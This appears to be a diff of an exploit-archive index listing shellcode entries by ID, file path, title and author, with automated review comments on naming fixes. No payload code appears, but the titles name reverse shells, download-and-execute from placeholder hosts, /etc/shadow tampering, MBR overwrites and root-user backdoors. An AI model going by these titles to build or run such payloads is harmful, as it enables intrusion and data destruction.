13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0 13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0
13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0 13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0
13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0 13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0
13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0 13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0
13436,platforms/lin_x86/shellcode/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0 13436,platforms/lin_x86/shellcode/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0
13437,platforms/lin_x86/shellcode/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13437,platforms/lin_x86/shellcode/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
13438,platforms/lin_x86/shellcode/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 13438,platforms/lin_x86/shellcode/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
13439,platforms/lin_x86/shellcode/13439.c,"Linux/x86 - eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0 13439,platforms/lin_x86/shellcode/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0
13440,platforms/lin_x86/shellcode/13440.c,"Linux/x86 - xterm -ut -display [IP]:0 Shellcode (132 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 13440,platforms/lin_x86/shellcode/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
13441,platforms/lin_x86/shellcode/13441.c,"Linux/x86 - ipchains -F Shellcode (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode,0 13441,platforms/lin_x86/shellcode/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode,0
13442,platforms/lin_x86/shellcode/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13442,platforms/lin_x86/shellcode/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
13443,platforms/lin_x86/shellcode/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13443,platforms/lin_x86/shellcode/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13444,platforms/lin_x86/shellcode/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13444,platforms/lin_x86/shellcode/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
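Review bot: the new description for 13440 reads "xterm -ut -display 1270.0.0.1:0", and 1270.0.0.1 is not a valid IPv4 address (the first octet exceeds 255). The old text used the placeholder "[IP]", so this looks like a typo introduced while filling in the value; please check it against 13440.c and correct it. Separately, 13425 changes its prefix from "Linux/x86" to "Linux/IA32" while its platform column stays lin_x86 and every other row in this hunk keeps "Linux/x86", which will break prefix-based filtering for that one entry.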
@ -15981,9 +15983,9 @@ id,file,description,date,author,platform,type,port
13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0 13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0
13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh (tolower() Evasion) Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0
13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0
13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0 13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0
13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0
13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0
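Review bot: row 13460 changes from "(toupper() Evasion)" to "ToLower Encoded", which flips the meaning rather than just restyling it. Row 13457 in the same hunk correctly goes from "(tolower() Evasion)" to "ToLower Encoded", so this looks like a copy-paste from that line; after the change the two rows differ only in byte count. Suggest "ToUpper Encoded" for 13460, matching the wording already used for 13427.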
@ -15993,8 +15995,8 @@ id,file,description,date,author,platform,type,port
13467,platforms/multiple/shellcode/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode,0 13467,platforms/multiple/shellcode/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode,0
13468,platforms/multiple/shellcode/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0 13468,platforms/multiple/shellcode/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0
13469,platforms/multiple/shellcode/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0 13469,platforms/multiple/shellcode/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0
13470,platforms/netbsd_x86/shellcode/13470.c,"NetBSD/x86 - kill all processes Shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode,0 13470,platforms/netbsd_x86/shellcode/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,netbsd_x86,shellcode,0
13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - Callback 6666/TCP Shellcode (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 13471,platforms/netbsd_x86/shellcode/13471.c,"NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 13472,platforms/netbsd_x86/shellcode/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 13473,platforms/netbsd_x86/shellcode/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0
13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0 13474,platforms/netbsd_x86/shellcode/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,netbsd_x86,shellcode,0
@ -16005,27 +16007,27 @@ id,file,description,date,author,platform,type,port
13479,platforms/osx_ppc/shellcode/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 13479,platforms/osx_ppc/shellcode/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0
13480,platforms/osx_ppc/shellcode/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13480,platforms/osx_ppc/shellcode/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
13481,platforms/osx_ppc/shellcode/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13481,platforms/osx_ppc/shellcode/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
13482,platforms/osx_ppc/shellcode/13482.c,"OSX/PPC - Add inetd backdoor Shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13482,platforms/osx_ppc/shellcode/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
13483,platforms/osx_ppc/shellcode/13483.c,"OSX/PPC - reboot Shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13483,platforms/osx_ppc/shellcode/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
13484,platforms/osx_ppc/shellcode/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13484,platforms/osx_ppc/shellcode/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
13485,platforms/osx_ppc/shellcode/13485.c,"OSX/PPC - create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13485,platforms/osx_ppc/shellcode/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
13486,platforms/osx_ppc/shellcode/13486.c,"OSX/PPC - simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13486,platforms/osx_ppc/shellcode/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
13487,platforms/osx_ppc/shellcode/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13487,platforms/osx_ppc/shellcode/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0
13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0
13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - Download File + Execute Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0 13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0
13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - setreuid + executes command Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0 13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - setreuid + executes command Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0
13491,platforms/generator/shellcode/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,generator,shellcode,0 13491,platforms/generator/shellcode/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,generator,shellcode,0
13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0 13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0
13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind TCP /bin/sh (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0 13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
13498,platforms/generator/shellcode/13498.php,"Solaris/x86 - Bind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",generator,shellcode,0 13498,platforms/generator/shellcode/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",generator,shellcode,0
13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 13500,platforms/solaris_x86/shellcode/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh toupper evasion Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 13501,platforms/solaris_x86/shellcode/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - Add services and execve inetd Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0 13502,platforms/solaris_x86/shellcode/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,solaris_x86,shellcode,0
13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0 13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0
13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode,0 13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,win_x86,shellcode,0
13505,platforms/win_x86/shellcode/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0 13505,platforms/win_x86/shellcode/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0
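Review bot: the two inetd rows end up with different naming patterns. 13482 becomes "Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell)", while 13502 becomes "inetd Add Service + execve" with no config path or port. Suggest using one pattern for both so they sort and search together. Row 13490 ("setreuid + executes command") is also left in its old wording although its neighbours in this hunk were normalized.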
@ -16055,14 +16057,14 @@ id,file,description,date,author,platform,type,port
13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File + Execute Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0 13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File + Execute Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0
13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0 13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0
13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0 13532,platforms/win_x86/shellcode/13532.asm,"Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode,0
13533,platforms/win_x86-64/shellcode/13533.asm,"Windows x64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0 13533,platforms/win_x86-64/shellcode/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode,0
13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - kill all processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0 13548,platforms/lin_x86/shellcode/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode,0
13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13549,platforms/lin_x86/shellcode/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13550,platforms/lin_x86/shellcode/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
13551,platforms/lin_x86/shellcode/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13551,platforms/lin_x86/shellcode/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0
13553,platforms/lin_x86/shellcode/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0 13553,platforms/lin_x86/shellcode/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0
13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0 13560,platforms/windows/shellcode/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode,0
13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - Pverwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0 13563,platforms/lin_x86/shellcode/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode,0
13565,platforms/win_x86/shellcode/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode,0 13565,platforms/win_x86/shellcode/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode,0
13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,lin_x86,shellcode,0 13566,platforms/lin_x86/shellcode/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,lin_x86,shellcode,0
13569,platforms/win_x86/shellcode/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0 13569,platforms/win_x86/shellcode/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule to Allow 445/TCP Traffic Shellcode",2009-12-24,sinn3r,win_x86,shellcode,0
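Review bot: the fix to 13563 corrects "Pverwrite" to "Overwrite" but leaves the mismatched delimiters around the string: it still opens with "_" and closes with "'" ("with _LOL!'"). Other rows in this hunk pair the underscores, for example 13549's "execve(_/sbin/poweroff -f_)". Since the line is being touched anyway, suggest "_LOL!_" for consistency.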
@ -16076,7 +16078,7 @@ id,file,description,date,author,platform,type,port
13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0 13579,platforms/lin_x86/shellcode/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode,0
13581,platforms/windows/shellcode/13581.txt,"Windows XP Professional SP2 (English) - Message Box Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 13581,platforms/windows/shellcode/13581.txt,"Windows XP Professional SP2 (English) - Message Box Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
13582,platforms/windows/shellcode/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0 13582,platforms/windows/shellcode/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode,0
13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0 13586,platforms/lin_x86/shellcode/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode,0
13595,platforms/win_x86/shellcode/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0 13595,platforms/win_x86/shellcode/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode,0
13599,platforms/lin_x86/shellcode/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 13599,platforms/lin_x86/shellcode/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
13600,platforms/lin_x86/shellcode/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 13600,platforms/lin_x86/shellcode/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0
@ -16089,7 +16091,7 @@ id,file,description,date,author,platform,type,port
13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2010-02-27,ipv,lin_x86,shellcode,0 13628,platforms/lin_x86/shellcode/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2010-02-27,ipv,lin_x86,shellcode,0
